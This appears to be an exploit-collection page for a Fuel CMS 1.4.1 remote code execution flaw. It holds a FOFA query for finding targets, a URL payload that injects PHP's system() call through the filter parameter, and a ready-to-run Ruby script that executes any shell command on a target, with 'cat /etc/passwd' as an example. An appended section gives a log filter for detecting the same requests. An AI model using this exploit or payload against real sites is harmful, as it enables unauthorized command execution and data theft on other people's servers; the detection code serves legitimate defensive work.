    Fuel CMS 1.4.1 远程代码执行.md
    1.23 KB / 2021-05-21 09:14:38
    # Fuel CMS 1.4.1 Remote Code Execution
    
    FOFA:
    
    ```
    "Fuel CMS"
    ```
    
    PoC:
    
    ```bash
    /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'
    ```
    
    ```ruby
    #!/usr/bin/env ruby
    
    require 'httpclient'
    require 'docopt'
    
    # dirty workaround to ignore Max-Age
    # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
    $VERBOSE = nil
    
    doc = <<~DOCOPT
      Fuel CMS 1.4 - Remote Code Execution
    
      Usage:
        #{__FILE__} <url> <cmd>
        #{__FILE__} -h | --help
    
      Options:
        <url>         Root URL (base path) including HTTP scheme, port and root folder
        <cmd>         The system command to execute
        -h, --help    Show this screen
    
      Examples:
        #{__FILE__} http://example.org id
        #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
    DOCOPT
    
    def exploit(client, root_url, cmd)
      url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
    
      res = client.get(url)
    
      /system(.+?)<div/mx.match(res.body).captures[0].chomp
    end
    
    begin
      args = Docopt.docopt(doc)
      clnt = HTTPClient.new
      puts exploit(clnt, args['<url>'], args['<cmd>'])
    rescue Docopt::Exit => e
      puts e.message
    end
    
    ```
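Detection side, as an added example (not part of the original page or the referenced exploit): a log filter that decodes the `filter` parameter of requests to `/fuel/pages/select/` and flags values that contain both a single quote and PHP call syntax, the shape of the PoC request above. The combined log format, the sample lines and the two-condition heuristic are assumptions made for this illustration.

```ruby
require 'uri'

# PHP call syntax inside a decoded value: name( or $var(  (heuristic, assumed)
CALL_SYNTAX = /\$?[A-Za-z_]\w*\s*\(/

# Request target from a combined-log-format line, or nil.
def request_target(line)
  m = line.match(%r{"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"})
  m && m[1]
end

# Percent-decode up to `rounds` times so encoded and double-encoded
# values are compared in the same form.
def deep_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value.scrub
rescue ArgumentError
  value.scrub # malformed escape: keep the last form that decoded cleanly
end

# Decoded `filter` parameter of a request to /fuel/pages/select/, or nil.
def filter_param(target)
  path, query = target.split('?', 2)
  return nil unless query && path.match?(%r{/fuel/pages/select/?\z}i)
  query.split('&').each do |pair|
    key, val = pair.split('=', 2)
    return deep_decode(val.to_s) if key == 'filter'
  end
  nil
end

# True when the filter value both leaves the quoted string and calls a function.
def suspicious?(line)
  target = request_target(line)
  value = target && filter_param(target)
  !value.nil? && value.include?("'") && value.match?(CALL_SYNTAX)
end

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
  %q{192.0.2.10 - - [21/May/2021:09:14:38 +0000] "GET /fuel/pages/select/?filter=published HTTP/1.1" 200 512},
  %q{192.0.2.66 - - [21/May/2021:09:15:02 +0000] "GET /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('id')%2B' HTTP/1.1" 200 901},
  %q{192.0.2.66 - - [21/May/2021:09:15:09 +0000] "GET /fuelcms/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27id%27%29%2B%27 HTTP/1.1" 200 901},
  %q{192.0.2.20 - - [21/May/2021:09:16:40 +0000] "GET /blog/list?filter=o'neil(1) HTTP/1.1" 200 300}
].freeze
```

`SAMPLE_LOG.select { |l| suspicious?(l) }` returns the second and third lines; the fully percent-encoded variant is caught only because the value is decoded before matching.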
    
    ref:
    
    * https://github.com/nahi/httpclient/issues/242
    * https://www.exploit-db.com/exploits/49487
    